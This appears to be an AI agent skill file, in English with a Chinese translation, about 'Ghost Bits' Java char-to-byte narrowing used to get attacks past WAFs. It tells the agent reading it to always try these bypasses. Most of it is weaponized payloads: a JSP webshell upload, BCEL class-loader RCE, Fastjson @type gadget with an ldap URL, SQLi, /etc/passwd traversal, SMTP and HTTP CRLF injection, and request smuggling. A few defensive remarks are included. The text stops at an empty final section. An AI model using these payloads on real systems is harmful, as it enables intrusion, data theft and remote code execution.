ghost-bits-cast-attack

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Ghost Bits / Cast Attack — Java char to byte Narrowing Playbook

技能:Ghost Bits / 强制转换攻击 — Java char转byte窄化攻击手册

AI LOAD INSTRUCTION: This is a Java-only injection-enabling primitive, not a standalone vulnerability class. Whenever you see (1) a Java backend, (2) a WAF/IDS in front of it, and (3) any of {SQLi, deser RCE, file upload, path traversal, CRLF, request smuggling, SMTP injection} on the menu, ALWAYS try Ghost Bits variants of the payload before declaring it "blocked". The root cause is the silent loss of the high 8 bits when Java code narrows a 16-bit
char
to an 8-bit
byte
— the WAF sees a harmless Unicode character, the backend reconstructs the original ASCII attack byte. Base models almost never reach for this primitive.
Source: Black Hat Asia 2026 talk Cast Attack: A New Threat Posed by Ghost Bits in Java by Xinyu Bai (@b1u3r), Zhihui Chen (@1ue), with contributor Zongzheng Zheng (@chun_springX).
AI加载说明:这是仅适用于Java的注入启用原语,并非独立的漏洞类别。当你遇到以下场景时:(1) Java后端,(2) 前端部署了WAF/IDS,(3) 存在SQL注入、反序列化RCE、文件上传、路径遍历、CRLF注入、请求走私、SMTP注入等攻击可能性,务必先尝试Ghost Bits变体的 payload,再判定攻击被“拦截”。其根本原因是Java代码将16位
char
窄化为8位
byte
时,高位8位会被静默丢失——WAF看到的是无害的Unicode字符,而后端会重构出原始的ASCII攻击字节。基础模型几乎不会主动使用该原语。
来源:Black Hat Asia 2026演讲《Cast Attack: A New Threat Posed by Ghost Bits in Java》,演讲者Xinyu Bai (@b1u3r)、Zhihui Chen (@1ue),贡献者Zongzheng Zheng (@chun_springX)。

0. RELATED ROUTING

0. 相关关联

Ghost Bits is a bypass primitive that re-enables payloads from many other playbooks. Pair it with whichever attack family applies:
  • waf-bypass-techniques — when a Java backend is suspected and WAF rules block the literal payload, this is the first technique to try beyond classic encoding.
  • deserialization-insecure — for Apache Commons BCEL ClassLoader and Fastjson
    \u
    /
    \x
    escape variants.
  • path-traversal-lfi — Spring, Jetty, Undertow, Vert.x URL decoding and
    %2>
    hex folding.
  • upload-insecure-files — Tomcat
    RFC2231Utility
    filename*
    Webshell upload.
  • request-smuggling — Apache HttpClient
    <= 4.5.9
    (HTTPCLIENT-1974/1978) header CRLF.
  • crlf-injection — Angus Mail / Jakarta Mail SMTP injection and JDK HttpServer response splitting.
  • sqli-sql-injection — Jackson
    charToHex
    table-lookup truncation hides SQL keywords inside Unicode escapes.
Ghost Bits是一种绕过原语,可重新启用许多其他攻击手册中的payload。请根据攻击类型搭配使用:
  • waf-bypass-techniques — 当怀疑目标是Java后端且WAF规则拦截了明文payload时,这是除经典编码外的首选绕过技术。
  • deserialization-insecure — 适用于Apache Commons BCEL ClassLoader和Fastjson
    \\u
    /
    \\x
    转义变体场景。
  • path-traversal-lfi — 适用于Spring、Jetty、Undertow、Vert.x的URL解码和
    %2>
    十六进制折叠场景。
  • upload-insecure-files — 适用于Tomcat
    RFC2231Utility
    filename*
    Webshell上传场景。
  • request-smuggling — 适用于Apache HttpClient
    <= 4.5.9
    (HTTPCLIENT-1974/1978)的头部CRLF注入场景。
  • crlf-injection — 适用于Angus Mail / Jakarta Mail的SMTP注入和JDK HttpServer的响应拆分场景。
  • sqli-sql-injection — 适用于Jackson
    charToHex
    表查询截断,将SQL关键字隐藏在Unicode转义中的场景。

Advanced Reference

进阶参考

Load PAYLOAD_COOKBOOK.md when you need:
  • Full byte-to-Ghost-character lookup table covering every printable ASCII byte 0x20–0x7E and the most useful control bytes (0x00, 0x09, 0x0A, 0x0D).
  • Per-component affected version matrix and patch identifiers.
  • Yaklang and Python one-liner payload generators (for
    poc.HTTP
    ,
    codec.Encode
    , raw socket).
  • "Multi-view normalization engine" pseudocode for blue-team WAF detection.

当你需要以下内容时,请加载PAYLOAD_COOKBOOK.md
  • 完整的字节到幽灵字符对照表,覆盖所有可打印ASCII字节0x20–0x7E及最常用的控制字节(0x00、0x09、0x0A、0x0D)。
  • 各组件的受影响版本矩阵及补丁标识。
  • Yaklang和Python的单行payload生成器(适用于
    poc.HTTP
    codec.Encode
    、原始套接字)。
  • 用于蓝队WAF检测的“多视图归一化引擎”伪代码。

1. ONE-MINUTE MENTAL MODEL

1. 一分钟核心模型

Java's
char
is a 16-bit unsigned integer (UTF-16 code unit). Almost every wire protocol — HTTP/1.1, SMTP, Redis RESP, file paths, raw byte streams — is 8-bit byte oriented. The right way to bridge them is explicit charset encoding:
// Correct: explicit UTF-8, multi-byte chars become multi-byte sequences
byte[] bytes = str.getBytes(StandardCharsets.UTF_8);
out.write(bytes);
Tons of legacy code, framework internals, and "fast path" optimizations skip this and silently narrow:
// Dangerous: high 8 bits silently dropped
byte b = (byte) ch;          // 0x966A -> 0x6A
out.write(ch);               // ByteArrayOutputStream.write(int) keeps low 8 bits
dos.writeBytes(str);         // DataOutputStream loops char->byte cast
int v = ch & 0xFF;           // explicit low-byte mask
The lost high 8 bits are the Ghost Bits. They turn a multi-byte Unicode character into a single attacker-chosen ASCII byte at the protocol layer.
View A (string layer: WAF / business validation / logs)
  sees: 陪 阮 严 灵 瘍 瘊 ...   "harmless Unicode garbage, allow"
                  |
                  v       silent narrowing somewhere in the call stack
View B (byte layer: protocol / file system / parser / class loader)
  sees: j  .  %  u  \r \n ...  "executes the dangerous semantics"

The boundary is breached at the exact moment "view A" and "view B" disagree.
Mathematical formulation: to make View B see byte
T
, pick any
k in 0x01..0xFF
and use:
c = chr((k << 8) | T)
That gives you 255 candidate Unicode characters per dangerous byte — plenty of room to dodge any signature-based blacklist.

Java的
char
16位无符号整数(UTF-16代码单元)。几乎所有有线协议——HTTP/1.1、SMTP、Redis RESP、文件路径、原始字节流——都是8位字节导向的。正确的转换方式是显式字符集编码:
// 正确方式:显式UTF-8编码,多字节字符转为多字节序列
byte[] bytes = str.getBytes(StandardCharsets.UTF_8);
out.write(bytes);
大量遗留代码、框架内部逻辑和“快速路径”优化会跳过显式编码,直接进行静默窄化:
// 危险操作:高位8位被静默丢弃
byte b = (byte) ch;          // 0x966A -> 0x6A
out.write(ch);               // ByteArrayOutputStream.write(int)仅保留低位8位
dos.writeBytes(str);         // DataOutputStream循环执行char->byte强制转换
int v = ch & 0xFF;           // 显式取低字节掩码
丢失的高位8位就是幽灵位(Ghost Bits)。它会将多字节Unicode字符在协议层转换为攻击者指定的单个ASCII字节。
视图A(字符串层:WAF / 业务校验 / 日志)
  看到:陪 阮 严 灵 瘍 瘊 ...   "无害的Unicode乱码,允许通过"
                  |
                  v       调用栈中某处发生静默窄化
视图B(字节层:协议 / 文件系统 / 解析器 / 类加载器)
  看到:j  .  %  u  \\r \
 ...  "执行危险语义"

当“视图A”和“视图B”的认知出现分歧时,边界就被突破了。
数学公式:要让视图B看到字节
T
,选择任意
k in 0x01..0xFF
并使用:
c = chr((k << 8) | T)
这意味着每个危险字节对应255个候选Unicode字符——有足够空间避开任何基于特征的黑名单。

2. THREE ROOT-CAUSE FAMILIES

2. 三类根本原因

The Ghost Bits umbrella covers three distinct underlying bugs. Distinguishing them tells you both which payload shape to send and what to grep for in source.
Ghost Bits涵盖三种不同的底层问题。区分它们可以让你明确应发送的payload形态,以及在源码中应搜索的内容。

Family A — Real high-bit truncation (classic Ghost Bits)

A类 — 真实高位截断(经典Ghost Bits)

The narrowing is literal and unconditional.
java
// Pattern A1: explicit cast
byte b = (byte) ch;

// Pattern A2: bitwise mask
int v = ch & 0xFF;
int v = ch & 255;

// Pattern A3: OutputStream.write(int) keeps low 8 bits only
out.write(ch);
baos.write(ch);

// Pattern A4: DataOutputStream.writeBytes(String) iterates chars,
//             writing low byte of each
dos.writeBytes(str);

// Pattern A5: deprecated APIs that still exist in old code
String.getBytes(int srcBegin, int srcEnd, byte[] dst, int dstBegin);
new StringBufferInputStream(str);
raf.writeBytes(str);
Typical impact: Tomcat
filename*
, Apache BCEL ClassLoader, Lettuce Redis writer, SMTP CRLF in Angus Mail, HTTPCLIENT-1974 header injection.
窄化操作是直接且无条件的。
java
// 模式A1:显式强制转换
byte b = (byte) ch;

// 模式A2:位掩码
int v = ch & 0xFF;
int v = ch & 255;

// 模式A3:OutputStream.write(int)仅保留低位8位
out.write(ch);
baos.write(ch);

// 模式A4:DataOutputStream.writeBytes(String)遍历字符,写入每个字符的低字节
dos.writeBytes(str);

// 模式A5:仍存在于旧代码中的废弃API
String.getBytes(int srcBegin, int srcEnd, byte[] dst, int dstBegin);
new StringBufferInputStream(str);
raf.writeBytes(str);
典型影响:Tomcat
filename*
、Apache BCEL ClassLoader、Lettuce Redis写入器、Angus Mail中的SMTP CRLF注入、HTTPCLIENT-1974头部注入。

Family B — Bit-arithmetic folding (illegal char becomes legal)

B类 — 位运算折叠(非法字符变为合法字符)

A "fast" hex / base64 / charset decoder uses bit tricks instead of strict range checks, so an illegal character collapses onto a legal one.
java
// Jetty TypeUtil.fromHexDigit (simplified)
private static int fromHexDigit(char c) {
    int x = c & 0x1F;          // keep low 5 bits
    x += (c >> 6) * 25;
    x -= 16;
    return x;                  // expected 0..15, but no range check
}
Worked example: feed
>
(0x3E):
0x3E & 0x1F = 0x1E = 30
(0x3E >> 6) * 25 = 0
30 + 0 - 16 = 14 = 0xE
So
%2>
is silently parsed as
%2E
=
.
. The same algebra makes
%2^
,
%2~
etc. equivalent to other hex digits.
Typical impact: Openfire CVE-2023-32315, GeoServer CVE-2024-36401, generic URL-decode WAF bypass.
“快速”十六进制/Base64/字符集解码器使用位运算而非严格的范围检查,导致非法字符被折叠为合法字符。
java
// Jetty TypeUtil.fromHexDigit(简化版)
private static int fromHexDigit(char c) {
    int x = c & 0x1F;          // 保留低5位
    x += (c >> 6) * 25;
    x -= 16;
    return x;                  // 预期返回0..15,但无范围检查
}
示例:传入
>
(0x3E):
0x3E & 0x1F = 0x1E = 30
(0x3E >> 6) * 25 = 0
30 + 0 - 16 = 14 = 0xE
因此
%2>
会被静默解析为
%2E
=
.
。同理,
%2^
%2~
等也等价于其他十六进制数字。
典型影响:Openfire CVE-2023-32315、GeoServer CVE-2024-36401、通用URL解码WAF绕过。

Family C — Lax Unicode normalization

C类 — 宽松Unicode归一化

The decoder accepts Unicode characters that happen to be classified as "digit" or that map to a hex value via a
& 0xFF
lookup — even though they were never meant to participate in protocol parsing.
java
// Fastjson: too permissive
Character.digit(c, 16);   // accepts Thai, Punjabi, fullwidth digits

// Jackson: index by low 8 bits into an ASCII-only table
return sHexValues[ch & 0xff];

// Generic: fullwidth normalization
// '2' (U+FF12) -> '2', 'e' (U+FF45) -> 'e'
Typical impact: Fastjson
\u
and
\x
escape bypass, fullwidth URL-encoded path traversal, Jackson
charToHex
SQLi smuggling.

解码器接受被归类为“数字”或通过
& 0xFF
查找映射为十六进制值的Unicode字符——尽管这些字符本不应参与协议解析。
java
// Fastjson:过于宽松
Character.digit(c, 16);   // 接受泰文、旁遮普文、全角数字

// Jackson:通过低8位索引仅包含ASCII的表
return sHexValues[ch & 0xff];

// 通用场景:全角归一化
// '2' (U+FF12) -> '2', 'e' (U+FF45) -> 'e'
典型影响:Fastjson
\\u
\\x
转义绕过、全角URL编码路径遍历、Jackson
charToHex
SQL注入走私。

3. CHARACTER GENERATOR

3. 字符生成器

Build any Ghost Bits character on the fly. This is the single function every agent should keep in mind:
python
undefined
可动态生成任意Ghost Bits字符。以下是每个攻击工具应牢记的核心函数:
python
undefined

Python

Python

def ghost(target_byte: int, k: int = 1) -> str: """Return a Unicode char whose low 8 bits equal target_byte.""" return chr(((k & 0xFF) << 8) | (target_byte & 0xFF))
def ghost(target_byte: int, k: int = 1) -> str: """返回一个低8位等于target_byte的Unicode字符。""" return chr(((k & 0xFF) << 8) | (target_byte & 0xFF))

255 candidates per byte, e.g. for '.' (0x2E):

每个字节对应255个候选字符,例如针对 '.' (0x2E):

candidates = [ghost(0x2E, k) for k in range(1, 256)]
candidates = [ghost(0x2E, k) for k in range(1, 256)]

阮(U+962E), Ⱦ?-prefixed-..., etc.

阮(U+962E), Ⱦ?-prefixed-..., 等


```yak
// Yaklang (for poc.HTTP / fuzz)
func ghost(targetByte, k) {
    return string(rune(((k & 0xFF) << 8) | (targetByte & 0xFF)))
}
ghostJ = ghost(0x6A, 0x96)   // returns "陪"
Selection guidance:
  • Avoid surrogate range
    0xD800..0xDFFF
    (high byte 0xD8..0xDF) — those are not valid scalar values and will be replaced by the JVM string decoder before reaching the narrowing site, defeating the bypass.
  • Prefer characters that survive the application's own charset round-trip (Latin-Extended, CJK Unified Ideographs, Enclosed CJK Letters and Months, Hangul). If the request body uses UTF-8, these all encode cleanly into multi-byte sequences that no WAF rule recognizes as
    .
    ,
    /
    ,
    j
    , etc.
  • Rotate
    k
    between requests so signature based learning cannot pin a single character to a single attack.


```yak
// Yaklang(适用于poc.HTTP / 模糊测试)
func ghost(targetByte, k) {
    return string(rune(((k & 0xFF) << 8) | (targetByte & 0xFF)))
}
ghostJ = ghost(0x6A, 0x96)   // 返回 "陪"
选择指南:
  • 避免代理范围
    0xD800..0xDFFF
    (高位字节0xD8..0xDF)——这些不是有效的标量值,会被JVM字符串解码器替换,无法到达窄化点,导致绕过失效。
  • 优先选择能在应用自身字符集往返过程中保留的字符(拉丁扩展字符、中日韩统一表意文字、中日韩封闭字母和月份、韩文)。如果请求体使用UTF-8,这些字符会被干净地编码为多字节序列,WAF规则无法识别为
    .
    /
    j
    等。
  • 在请求间轮换
    k
    值,避免基于特征的学习将单个字符与单一攻击关联。

4. DANGEROUS-BYTE TO GHOST-CHARACTER MAP

4. 危险字节到幽灵字符映射表

Compact red-team weaponization table. For every byte the attacker actually needs, one verified Unicode char is given; substitute another
k
if the WAF later learns the example.
Target byteHexUsed forGhost charCode point
\t
0x09header folding, parser confusion
ĉ
U+0109
\n
0x0ACRLF injection, log injection
U+760A
\r
0x0DCRLF injection, request smuggling
U+760D
 
0x20header break, command separator
Ġ
U+0120
"
0x22string break in JSON / quoted-printable
Ģ
U+0122
%
0x25URL encoding prefix, second decode
U+4E25
&
0x26parameter separator
Ȧ
U+0226
'
0x27SQL string break
ȧ
U+0227
(
0x28EL/SpEL/OGNL syntax
Ȩ
U+0228
)
0x29EL/SpEL/OGNL syntax
ȩ
U+0229
.
0x2Epath traversal, extension
U+962E
/
0x2Fpath separator
U+4E2F
0
0x30hex digit construction
U+4E30
1
0x31hex digit construction
U+5931
2
0x32hex digit construction
U+7532
3
0x33hex digit construction
U+8033
;
0x3Bcommand separator, header continuation
Ȼ
U+023B
<
0x3CXSS / XML tag start
ȼ
U+023C
=
0x3Dparameter / header value
Ƚ
U+023D
>
0x3EXSS / XML tag end
Ⱦ
U+023E
@
0x40Fastjson
@type
, mail address
ŀ
U+0140
a
0x61keyword
class
, alphabet
U+1661
c
0x63keyword
class
,
cmd
U+3E63
e
0x65hex digit
U+6765
j
0x6Aextension
.jsp
U+966A
l
0x6Ckeyword
class
,
closure
U+0C6C
n
0x6Ekeyword
Runtime
,
union
U+966E
s
0x73keyword
class
,
select
U+2473
t
0x74keyword
Runtime
,
type
Ŵ
U+0174
u
0x75
\u
escape introducer
U+7075
Workflow tip: keep the ASCII
Ŀ
,
ȧ
,
ȼ
, etc. variants for tight HTTP header contexts (one byte UTF-8 expansion stays smaller); use CJK like
,
,
when you want to bias the WAF "this is just text" classifier.

精简的红队武器化表格。针对每个攻击者需要的字节,提供一个经过验证的Unicode字符;如果WAF识别了示例字符,可替换其他
k
值。
目标字节十六进制用途幽灵字符代码点
\\t
0x09头部折叠、解析器混淆
ĉ
U+0109
`\
`0x0ACRLF注入、日志注入
U+760A
\\r
0x0DCRLF注入、请求走私
U+760D
 
0x20头部换行、命令分隔符
Ġ
U+0120
"
0x22JSON/可打印字符串中的字符串截断
Ģ
U+0122
%
0x25URL编码前缀、二次解码
U+4E25
&
0x26参数分隔符
Ȧ
U+0226
'
0x27SQL字符串截断
ȧ
U+0227
(
0x28EL/SpEL/OGNL语法
Ȩ
U+0228
)
0x29EL/SpEL/OGNL语法
ȩ
U+0229
.
0x2E路径遍历、文件后缀
U+962E
/
0x2F路径分隔符
U+4E2F
0
0x30十六进制数字构造
U+4E30
1
0x31十六进制数字构造
U+5931
2
0x32十六进制数字构造
U+7532
3
0x33十六进制数字构造
U+8033
;
0x3B命令分隔符、头部续行
Ȼ
U+023B
<
0x3CXSS/XML标签开始
ȼ
U+023C
=
0x3D参数/头部值
Ƚ
U+023D
>
0x3EXSS/XML标签结束
Ⱦ
U+023E
@
0x40Fastjson
@type
、邮件地址
ŀ
U+0140
a
0x61关键字
class
、字母表
U+1661
c
0x63关键字
class
cmd
U+3E63
e
0x65十六进制数字
U+6765
j
0x6A文件后缀
.jsp
U+966A
l
0x6C关键字
class
closure
U+0C6C
n
0x6E关键字
Runtime
union
U+966E
s
0x73关键字
class
select
U+2473
t
0x74关键字
Runtime
type
Ŵ
U+0174
u
0x75
\\u
转义起始符
U+7075
工作流提示:在紧凑的HTTP头部场景中,使用ASCII变体如
Ŀ
ȧ
ȼ
(UTF-8扩展仅占1字节);当希望引导WAF将其判定为“普通文本”时,使用中日韩字符如

5. PER-COMPONENT PAYLOAD RECIPES

5. 各组件Payload方案

Every recipe shows the dual view: what the WAF inspects vs. what the backend actually executes. This is the only reliable way to explain why the payload goes through.
每个方案展示双重视图:WAF检测到的内容 vs 后端实际执行的内容。这是解释payload为何能通过的唯一可靠方式。

5.1 Tomcat
RFC2231Utility
— file upload Webshell (Family A)

5.1 Tomcat
RFC2231Utility
— 文件上传Webshell(A类)

Trigger: any endpoint that accepts multipart upload and Tomcat parses
Content-Disposition: ... filename*=UTF-8''...
. Tomcat's RFC2231 decoder casts each non-percent character directly to byte, dropping the high 8 bits.
Payload:
Content-Disposition: attachment; filename*=UTF-8''1.陪sp
StageFilename it sees
WAF / extension filter
1.陪sp
(not
.jsp
, allow)
Tomcat RFC2231 decoder
-> low byte 0x6A ->
j
File system
1.jsp
Combine with traversal characters from section 4 (
,
) when the upload target directory is fixed but the application accepts a
filename*
.
触发条件:任何接受多部分上传且Tomcat解析
Content-Disposition: ... filename*=UTF-8''...
的端点。Tomcat的RFC2231解码器会将每个非百分号字符直接强制转换为字节,丢弃高位8位。
Payload:
Content-Disposition: attachment; filename*=UTF-8''1.陪sp
阶段看到的文件名
WAF / 后缀过滤器
1.陪sp
(不是
.jsp
,允许通过)
Tomcat RFC2231解码器
-> 低字节0x6A ->
j
文件系统
1.jsp
当上传目标目录固定但应用接受
filename*
时,可结合第4节中的遍历字符(
)使用。

5.2 Apache Commons BCEL — ClassLoader RCE (Family A)

5.2 Apache Commons BCEL — ClassLoader RCE(A类)

Trigger: any sink that resolves a class name through
BCEL
(
$$BCEL$$...
) or any code that decodes BCEL via the
JavaReader
->
ByteArrayOutputStream
loop.
Vulnerable shape:
java
ByteArrayOutputStream bos = new ByteArrayOutputStream();
JavaReader jr = new JavaReader(new CharArrayReader(userChars));
while ((ch = jr.read()) >= 0) {
    bos.write(ch);     // low 8 bits only
}
Attack: wrap each byte of the malicious BCEL bytecode into a Unicode character whose low 8 bits equal that byte. The decoded byte stream is a valid BCEL class; the WAF sees a long blob of CJK text without
$$BCEL$$
keywords or class signatures.
ViewContent
WAF
$$BCEL$$
followed by random looking CJK
BCELstandard BCEL class file bytes → JVM defineClass → RCE
Defense for blue team: a WAF inspecting BCEL must replicate the
bos.write(ch)
semantics on each character before pattern matching.
触发条件:任何通过
BCEL
$$BCEL$$...
)解析类名的 sink,或任何通过
JavaReader
->
ByteArrayOutputStream
循环解码BCEL的代码。
漏洞形态:
java
ByteArrayOutputStream bos = new ByteArrayOutputStream();
JavaReader jr = new JavaReader(new CharArrayReader(userChars));
while ((ch = jr.read()) >= 0) {
    bos.write(ch);     // 仅保留低8位
}
攻击方式:将恶意BCEL字节码的每个字节包装为低8位等于该字节的Unicode字符。解码后的字节流是有效的BCEL类;WAF看到的是无
$$BCEL$$
关键字或类特征的长段中日韩文本。
视图内容
WAF
$$BCEL$$
后跟看似随机的中日韩字符
BCEL标准BCEL类文件字节 → JVM defineClass → RCE
蓝队防御建议:检测BCEL的WAF必须在模式匹配前,对每个字符复制
bos.write(ch)
的语义。

5.3 Jackson
charToHex
— SQLi smuggling (Family C)

5.3 Jackson
charToHex
— SQL注入走私(C类)

Trigger: any Jackson-parsed JSON field whose value is later embedded in SQL or another parser. Jackson resolves
\uXXXX
digits via:
java
private static final int[] sHexValues = new int[128];
public static int charToHex(int ch) {
    return sHexValues[ch & 0xFF];   // mask first, lookup second
}
Any non-ASCII character whose low 8 bits land on a populated index returns that hex digit. The WAF sees gibberish; Jackson reconstructs an ASCII payload.
Payload (smuggle the digit
1
for a UNION column count):
json
{"q": "\u丰丰耳失 union select 1,2,3 -- "}
ViewContent
WAF
\u丰丰耳失 union select ...
(no leading digit)
Jackson
\u0031 union select 1,2,3-- 
->
1 union select…
Pair with sqli-sql-injection for the downstream UNION / boolean / time-based payload templates.
触发条件:任何Jackson解析的JSON字段值后续被嵌入SQL或其他解析器的场景。Jackson通过以下方式解析
\\uXXXX
数字:
java
private static final int[] sHexValues = new int[128];
public static int charToHex(int ch) {
    return sHexValues[ch & 0xFF];   // 先掩码,再查表
}
任何低8位落在已填充索引的非ASCII字符都会返回对应的十六进制数字。WAF看到的是乱码;Jackson会重构出ASCII payload。
Payload(走私数字
1
用于UNION列数判断):
json
{"q": "\\u丰丰耳失 union select 1,2,3 -- "}
视图内容
WAF
\\u丰丰耳失 union select ...
(无前导数字)
Jackson
\\u0031 union select 1,2,3-- 
->
1 union select…
可搭配sqli-sql-injection使用下游UNION/布尔/时间盲注的payload模板。

5.4 Fastjson —
\u
and
\x
escape bypass (Families B + C)

5.4 Fastjson —
\\u
\\x
转义绕过(B类 + C类)

Two independent surfaces:
(a)
\u
escape —
Character.digit(c, 16)
accepts Unicode digit categories beyond ASCII (Thai
๐-๙
U+0E50..U+0E59, Punjabi
੦-੯
U+0A66..U+0A6F, fullwidth
0-9
U+FF10..U+FF19).
json
{"\u4_type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x"}
WAF view:
\u4_type
(no
@type
literal). Fastjson normalizes fullwidth
to
4
, then handles
_
via the
\x
shortcut below, yielding
@type
.
(b)
\x
escape — Fastjson computes
digits[x1] * 16 + digits[x2]
. An illegal hex character returns the default value 0.
\x4_   ->   '4'(=4) * 16 + '_'(=0) = 0x40 = '@'
json
{"\x4_type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x"}
ViewField name
WAF
\x4_type
(not
@type
)
Fastjson
@type
-> JdbcRowSetImpl autotype gadget triggers
存在两个独立的攻击面:
(a)
\\u
转义 —
Character.digit(c, 16)
接受ASCII以外的Unicode数字类别(泰文
๐-๙
U+0E50..U+0E59、旁遮普文
੦-੯
U+0A66..U+0A6F、全角
0-9
U+FF10..U+FF19)。
json
{"\\u4_type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x"}
WAF视图:
\\u4_type
(无
@type
明文)。Fastjson将全角
归一化为
4
,再通过下方的
\\x
快捷方式处理
_
,最终得到
@type
(b)
\\x
转义 — Fastjson计算
digits[x1] * 16 + digits[x2]
。非法十六进制字符返回默认值0。
\\x4_   ->   '4'(=4) * 16 + '_'(=0) = 0x40 = '@'
json
{"\\x4_type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x"}
视图字段名
WAF
\\x4_type
(不是
@type
Fastjson
@type
-> JdbcRowSetImpl自动类型gadget触发

5.5 Spring / Jetty / Undertow / Vert.x — URL decoding (Families A + B)

5.5 Spring / Jetty / Undertow / Vert.x — URL解码(A类 + B类)

Two combinable tricks:
Trick 1 — Family A character substitution in path or query:
/api/v1/data?file=阮丯阮丯etc丯passwd
                = ../../etc/passwd at the byte layer
Trick 2 — Family B
%2>
folding when Jetty's
TypeUtil.fromHexDigit
is in the chain:
/setup/setup-s/%2>%2>/log.jsp
                = /setup/setup-s/../log.jsp after decode
Either alone bypasses most signature WAFs; combined they survive even "normalized then matched" rules that only see ASCII percent triplets.
Spring CVE-2025-41242 chain (
StringUtils.uriDecode
patched in PR #34673):
input :  阮严灵丰丰甲来
       (.)(%)(u)(0)(0)(2)(e)
narrow:  .%u002e
decode:  ..
result:  arbitrary file read via path traversal
StagePath
Spring
isInvalidPath()
.%u002e
— no literal
..
, allow
Backend file resolution
..
after
%u002e
decode → traversal
两种可组合的技巧:
技巧1 — 路径或参数中的A类字符替换:
/api/v1/data?file=阮丯阮丯etc丯passwd
                = ../../etc/passwd(字节层)
技巧2 — Jetty的
TypeUtil.fromHexDigit
参与处理时的B类
%2>
折叠:
/setup/setup-s/%2>%2>/log.jsp
                = /setup/setup-s/../log.jsp(解码后)
单独使用任一技巧即可绕过大多数基于特征的WAF;组合使用可避开甚至“先归一化再匹配”的规则(这类规则仅检测ASCII百分号三元组)。
Spring CVE-2025-41242攻击链(
StringUtils.uriDecode
在PR #34673中修复):
输入 :  阮严灵丰丰甲来
       (.)(%)(u)(0)(0)(2)(e)
窄化:  .%u002e
解码:  ..
结果:  通过路径遍历实现任意文件读取
阶段路径
Spring
isInvalidPath()
.%u002e
— 无明文
..
,允许通过
后端文件解析
%u002e
解码后得到
..
→ 路径遍历

5.6 Angus Mail / Jakarta Mail — SMTP injection (Family A)

5.6 Angus Mail / Jakarta Mail — SMTP注入(A类)

Trigger: any application that builds SMTP envelopes or headers from user-controlled strings. Internal
ASCIIUtility
does:
java
byte b = (byte) ch;           // 16-bit char silently narrowed
Smuggle CRLF as
瘍瘊
:
hacker@evil.com瘍瘊Subject: Password reset code瘍瘊To: target@victim.com瘍瘊瘍瘊Your code is 1234
ViewWhat it parses
Application validationa single
From
value containing odd CJK
SMTP serverfive separate header lines + body, fully spoofed
Real impact pattern: Jira-style (CVE-2025-57733) password-reset hijacking, Confluence domain allowlist bypass — pair with crlf-injection for non-mail CRLF reuse.
触发条件:任何从用户可控字符串构建SMTP信封或头部的应用。内部
ASCIIUtility
执行以下操作:
java
byte b = (byte) ch;           // 16位char被静默窄化
将CRLF伪装为
瘍瘊
hacker@evil.com瘍瘊Subject: Password reset code瘍瘊To: target@victim.com瘍瘊瘍瘊Your code is 1234
视图解析内容
应用校验包含特殊中日韩字符的单个
From
SMTP服务器五个独立的头部行 + 正文,完全被伪造
实际影响模式:Jira风格(CVE-2025-57733)的密码重置劫持、Confluence域名白名单绕过——可搭配crlf-injection用于非邮件场景的CRLF复用。

5.7 Apache HttpClient
<= 4.5.9
— request smuggling (Family A)

5.7 Apache HttpClient
<= 4.5.9
— 请求走私(A类)

HTTPCLIENT-1974 / HTTPCLIENT-1978: header values pass through
OutputStreamWriter
plus a narrow-cast write that emits raw
\r\n
for
\u760D\u760A
.
X-Auth-Token: 1瘍瘊POST /admin HTTP/1.1\r\nHost: internal\r\nContent-Length: 0\r\n\r\nGET /public HTTP/1.1
HopSees
Front proxy / WAFone request with a long
X-Auth-Token
Origintwo requests; the second is an admin POST
Cross-reference request-smuggling for chosen-prefix attacks once the desync is confirmed.
HTTPCLIENT-1974 / HTTPCLIENT-1978:头部值经过
OutputStreamWriter
和窄化写入操作,将
\\u760D\\u760A
转换为原始
\\r\ 
X-Auth-Token: 1瘍瘊POST /admin HTTP/1.1\\r\
Host: internal\\r\
Content-Length: 0\\r\
\\r\
GET /public HTTP/1.1
节点看到的内容
前端代理/WAF包含长
X-Auth-Token
的单个请求
源站两个请求;第二个是管理员POST请求
确认同步失效后,可参考request-smuggling进行选择前缀攻击。

5.8 JDK HttpServer — response splitting (CVE-2026-21933, Family A)

5.8 JDK HttpServer — 响应拆分(CVE-2026-21933,A类)

Reflection of user input into a response header passes through
com.sun.net.httpserver
writers that low-byte-cast each char.
Payload (URL parameter or upstream header):
Custom: Cu瘍瘊Content-Type: text/html瘍瘊Content-Length: 33瘍瘊瘍瘊<script>alert(1)</script>
Server emits two logical responses; the second carries an attacker-chosen body. Escalates to stored XSS, cache poisoning, and SSO redirect chains.
用户输入反射到响应头部时,会经过
com.sun.net.httpserver
写入器,对每个字符执行低字节强制转换。
Payload(URL参数或上游头部):
Custom: Cu瘍瘊Content-Type: text/html瘍瘊Content-Length: 33瘍瘊瘍瘊<script>alert(1)</script>
服务器会输出两个逻辑响应;第二个响应携带攻击者指定的正文。可升级为存储型XSS、缓存投毒和SSO重定向链。

5.9 Other affected components

5.9 其他受影响组件

Same Family A primitive, different sink:
  • Lettuce (Redis client) — command injection by smuggling
    \r\n
    into RESP frames; chain to arbitrary
    CONFIG SET dir
    +
    SAVE
    for SSRF-to-RCE.
  • Jodd
    FileNameUtil
    — path traversal via
    and
    because its internal write loop narrows.
  • XMLWriter — tag-name injection when an attribute or text node value is pushed through a low-byte writer; XXE / XSS pivot.
  • ActiveJ HTTP — CRLF injection identical in shape to 5.7 / 5.8.
  • Vert.x HTTP body parser — Family A in
    MultipartParser
    .
See PAYLOAD_COOKBOOK.md for affected-version matrix and full per-component payload skeletons.

同样基于A类原语,只是sink不同:
  • Lettuce(Redis客户端) — 通过将
    \\r\ 
    伪装后注入RESP帧实现命令注入;可结合任意
    CONFIG SET dir
    +
    SAVE
    实现SSRF到RCE的升级。
  • Jodd
    FileNameUtil
    — 内部写入循环存在窄化操作,可通过
    实现路径遍历。
  • XMLWriter — 属性或文本节点值通过低字节写入器推送时,可实现标签名注入;进而转向XXE/XSS攻击。
  • ActiveJ HTTP — 与5.7/5.8形态相同的CRLF注入。
  • Vert.x HTTP body parser
    MultipartParser
    中存在A类问题。
请查看PAYLOAD_COOKBOOK.md获取受影响版本矩阵和完整的各组件payload框架。

6. KNOWN-CVE BYPASS RECIPES

6. 已知CVE绕过方案

